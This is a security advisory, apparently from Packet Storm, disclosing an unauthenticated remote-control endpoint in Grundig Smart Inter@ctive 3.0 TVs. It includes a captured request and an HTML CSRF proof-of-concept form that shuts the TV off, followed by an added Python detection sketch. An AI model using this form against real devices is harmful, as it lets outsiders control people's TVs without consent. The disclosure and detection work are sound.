
Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

09 Jul 2018 | Reported by Ahmethan Gultekin | Type: packetstorm | Source: packetstormsecurity.com

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference vulnerability on Grundig Smart Remote Ap

Code
`# Exploit Title: Grundig Smart Remote App CSRF  
# Google Dork: Local Vulnerability  
# Date: 06.07.2018  
# Exploit Author: Ahmethan Gultekin ~ @inject0r16  
# Vendor Homepage: https://www.grundig.com/  
# Software Link: https://play.google.com/store/apps/details?id=arcelik.android.grundig.remote  
# Version: Grundig Smart Inter@ctive 3.0  
# Tested on: Windows 7-8-10  
# CVE : none  
  
Hello! I'm trying my TV. I saw a Grundig remote control application on  
Google Play.  
I downloaded the APK to the computer and decompiled it. And I began to examine  
the individual classes.  
I noticed in a class that a request was sent during operations on the  
command line.  
I downloaded a phone packet viewer, opened the control application and  
performed some operations.  
And I saw that there was a request like this:  
  
GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1  
  
I noticed that each process has an id value. Then I turned off the  
television using the control application and noted the outgoing IDs.  
The only requirement for the connection between the TV and the application  
was to have the same IP address.  
After I made the IP address on the TV and the phone and the IP address on  
the computer the same, I accessed the interface on port 8085.  
Now I could do anything from the computer :)  
  
CSRF POC :  
  
<html>  
<head>  
<title>Grundig TV PoC</title>  
</head>  
<body>  
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>  
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&keysymbol=-4081">  
<input type="submit" value="Go!">  
</form>  
</body>  
</html>  
  
This PoC will turn off the television when it is running. :)  
  
Video about the vulnerability:  
https://youtu.be/H7WYTkgtwsY  
  
  
#MoreThanYouImagine! ~ ahmeth4n.org  
  
greetz : @SmashTheKernel , @t3beq , @c_c0re  
`
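
A detection sketch for the behaviour described above, as an added example that is not part of the original advisory: it flags requests to the `/sendrcpackage` endpoint on port 8085 that carry a foreign `Origin` header or come from a host other than the paired remote. The record layout, IP addresses and allowlist are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/sendrcpackage"   # command path named in the advisory
TV_PORT = 8085                # port named in the advisory
REQ_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/1\.[01]$")

# Constructed records, not captured traffic:
# (source IP, request line, Host header, Origin header or None)
SAMPLE = [
    ("192.168.1.20", "GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1",
     "192.168.1.50:8085", None),
    ("192.168.1.33", "POST /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1",
     "192.168.1.50:8085", "http://example.test"),
    ("192.168.1.33", "GET /index.html HTTP/1.1", "192.168.1.50:8085", None),
    ("192.168.1.77", "GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1",
     "192.168.1.50:8085", None),
]
PAIRED_REMOTES = {"192.168.1.20"}  # assumption: the phone running the remote app


def classify(src, request_line, host, origin, paired=PAIRED_REMOTES):
    """Return None for unrelated or expected traffic, else a finding dict."""
    m = REQ_LINE.match(request_line)
    if not m:
        return None
    url = urlsplit(m.group(2))
    if url.path != ENDPOINT or urlsplit("//" + host).port != TV_PORT:
        return None
    query = parse_qs(url.query)
    finding = {"src": src, "method": m.group(1),
               "keyid": query.get("keyid", [None])[0],
               "keysymbol": query.get("keysymbol", [None])[0]}
    # Browsers attach Origin to cross-site form POSTs; the TV's own host never matches it.
    if origin is not None and urlsplit(origin).netloc != host:
        finding["reason"] = "cross-site"
    elif src not in paired:
        finding["reason"] = "unpaired-source"
    else:
        return None
    return finding


def scan(records):
    """Classify every record and keep only the findings."""
    return [f for f in (classify(*r) for r in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```
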
